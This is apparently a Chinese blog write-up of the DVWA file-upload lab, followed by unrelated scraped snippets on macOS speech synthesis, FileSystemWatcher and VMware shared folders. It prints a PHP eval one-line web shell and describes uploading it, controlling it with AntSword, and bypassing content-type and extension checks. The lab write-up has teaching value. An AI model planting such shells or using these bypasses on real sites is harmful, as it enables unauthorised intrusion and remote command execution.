2.medium
3. high
4.impossible
常見的一句話木馬:
<?php @eval
($_post
['shell'])
;?>
最外層的是 <?php和 ?> 這是php檔案的起始和結束標記,
php會解析執行 <?php ?>裡面的**。
然後是eval函式,eval()函式把字串按照 php **來計算,簡單來說就是它可以執行php**。
裡面$_post[『shell』]代表用post提交引數為shell的值。
沒有任何校驗,想傳什麼就傳什麼。
1.上傳一句話木馬1.php
**如下:
<?php
@eval
($_post
['shell'])
;?>
檔案儲存在根目錄/hackable/uploads/shell.php下。
localhost/dvwa/hackable/uploads/1.php?shell= phpinfo();
可以以shell為引數執行php命令。
例如:
可以在shell=echo(exec());裡面執行系統命令並且輸出到頁面。
例如:
2.中國蟻劍
中國蟻劍是一款跨平台的開源**管理工具,它主要面向於合法授權的滲透測試安全人員以及進行常規操作的**管理員。
新增資料:
然後就獲得許可權,可以進行資料管理,輸入命令等操作。圖如下:
檢視原始碼發現對uploaded_type,也就是http報文的content-type欄位進行了校驗,只能是image/jpeg和image/png。
用burp抓包,把content-type字段值改為image/jpeg即可繞過,成功上傳檔案。
檢視原始碼發現真的只能上傳jpg和png了
所以嘗試上傳馬,開啟乙個正常的,在尾部寫入一句話木馬
然後利用檔案包含來進行執行命令
不知道為啥連線不到蟻劍,如果有懂的人希望給我講一下。
對上傳檔案md5重新命名了,還對字尾名、檔案型別、檔案大小進行了限制和檢查,杜絕了上傳木馬檔案的機會。
NSSpeechSynthesizer 文字變語音
nsspeechsynthesizer 是 foundation中的乙個類,這個類可以方便的在cocoa應用程式中新增 文字到語言 功能。開發者可以使用這個類向ios 引用程式中新增類似功能。效果圖如下 截圖 speechutterance引數說明 utterance.voice 語系 不區分大小寫...
FileSystemWatcher判斷檔案複製完成
使用 filesystemwatcher 監視指定目錄中的更改。可監視指定目錄中的檔案或子目錄的更改。該元件可以監視本地計算機 網路驅動器或遠端計算機上的檔案。可監視目錄或檔案中的若干種更改。例如,可監視檔案或目錄的 attributes lastwrite 日期和時間或 size 方面的更改。通過...
Vmware Window Linux 共享資料夾
問題描述 在虛擬機器vmware 8.0下,其中宿主機系統為window 7,安裝的虛擬機器系統為ubuntu 12.04 x64,通過使用共享資料夾的方式,實現兩個系統的通訊。預備工作 虛擬機器需要安裝vmware tools。解決方案 1.在虛擬機器的詳細設定下,選擇啟用共享資料夾。右擊虛擬機器...